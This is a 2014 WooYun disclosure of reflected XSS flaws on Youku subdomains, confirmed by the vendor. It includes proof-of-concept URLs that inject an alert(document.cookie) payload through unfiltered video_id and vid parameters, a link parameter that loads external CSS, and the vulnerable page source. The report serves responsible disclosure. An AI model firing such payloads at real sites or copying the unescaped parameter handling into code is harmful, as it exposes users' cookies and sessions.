当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058102

漏洞标题:优酷多个分站多处反射型XSS

相关厂商:优酷

漏洞作者: 路人甲

提交时间:2014-04-22 20:16

修复时间:2014-06-06 20:17

公开时间:2014-06-06 20:17

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-22: 细节已通知厂商并且等待厂商处理中
2014-04-23: 厂商已经确认,细节仅向厂商公开
2014-05-03: 细节向核心白帽子及相关领域专家公开
2014-05-13: 细节向普通白帽子公开
2014-05-23: 细节向实习白帽子公开
2014-06-06: 细节向公众公开

简要描述:

变量未过滤直接引入至js代码段,优酷某分站多处反射型XSS

详细说明:

# Video_id 参数未过滤

http://comments.youku.com/comments/comments?video_id=12321312%27;alert(document.cookie);%27&bind_type=1&pl=6&width=0&height=0&minisite=1&color=1&backurl=http://www.wooyun.org


# 两处参数存在问题

http://minisite.youku.com/comments/i.php?vid=%27;alert(document.cookie);%27&pagesize=5000&link=http://www.wooyun.org/css/style.css


vid 直接代入js代码处
link 参数直接可引用外部CSS

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>minisite留言板</title>
<link href="http://static.youku.com/v1.0.0733/index/css/youku.css" type="text/css" rel="stylesheet" />
<link href="http://static.youku.com/v1.0.0733/v/css/play.css" type="text/css" rel="stylesheet" />
<link href="http://www.wooyun.org/css/style.css" type="text/css" rel="stylesheet" /><script type="text/javascript" src="js/minitool.js"></script>
<script type="text/javascript">
var vid = '';alert(document.cookie);'';
var pagesize = 5000;
function topage(vid,page,pagesize)
{
jQuery.get('index.php', {'vid':vid,'page':page,'pagesize':pagesize}, function(x){
var vid = jQuery(x).find('vid').text();
jQuery('#vid_'+vid+'_comments').html(jQuery(x).find('comment').text());
jQuery('.vid_'+vid+'_Pager').each(function (){
jQuery(this).html(jQuery(x).find('pager').text());
});
},'xml');
}
jQuery(function(){
topage(vid,1,pagesize);
});
function showfaces()

漏洞证明:

# 证明

youku.jpg

修复方案:

# 过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-04-23 08:32

厂商回复:

多谢提醒,马上修复

最新状态:

暂无